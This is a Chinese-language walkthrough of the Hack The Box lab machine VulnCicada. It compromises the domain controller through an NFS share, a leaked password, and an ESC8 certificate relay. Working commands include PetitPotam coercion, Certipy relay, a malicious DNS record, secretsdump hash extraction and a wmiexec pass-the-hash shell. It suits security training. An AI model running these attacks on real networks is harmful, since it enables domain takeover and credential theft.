本文详细记录了针对HTB靶机VulnCicada的完整渗透过程,包括NFS共享枚举、ADCS证书服务发现、ESC8漏洞利用以及通过证书中继获取域控制器权限的技术细节。
HTB: VulnCicada
侦察阶段
初始扫描
nmap发现25个开放的TCP端口,包括典型的Windows域控制器服务:
- 53/tcp (DNS)
- 80/tcp (HTTP)
- 88/tcp (Kerberos)
- 445/tcp (SMB)
- 2049/tcp (NFS)
- 以及其他AD相关端口
NFS共享发现
发现可公开访问的NFS共享:
1
2
3
|
showmount -e 10.129.234.48
Export list for 10.129.234.48:
/profiles (everyone)
|
挂载共享后找到两个图像文件:
- /mnt/Administrator/vacation.png
- /mnt/Rosie.Powell/marketing.png
marketing.png中的便利贴包含密码"Cicada123"
认证访问
SMB认证
使用发现的凭据成功认证:
1
|
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
|
共享枚举
发现CertEnroll共享(AD证书服务相关)和profiles$共享
ADCS枚举
Certipy扫描
发现ADCS漏洞:
1
|
certipy find -target DC-JPQ225.cicada.vl -u Rosie.Powell@cicada.vl -p Cicada123 -k -vulnerable -stdout
|
检测到ESC8漏洞:HTTP Web注册已启用
ESC8漏洞利用
攻击策略
- 创建恶意DNS记录
- 设置证书中继
- 强制域控制器认证
- 中继认证到ADCS Web服务
实施步骤
添加恶意DNS记录:
1
|
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.79
|
启动证书中继:
1
|
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
|
强制认证:
1
|
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
|
成功获取机器账户证书后认证:
1
|
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
|
权限提升
哈希转储
使用机器账户TGT转储管理员哈希:
1
|
KRB5CCNAME=dc-jpq225.ccache secretsdump.py -k -no-pass cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -just-dc-user administrator
|
获取Shell
使用WMI执行获取管理员shell:
1
|
wmiexec.py cicada.vl/administrator@dc-jpq225.cicada.vl -k -hashes :85a0da53871a9d56b6cd05deda3a5e87
|
成功获得域管理员权限并捕获两个flag。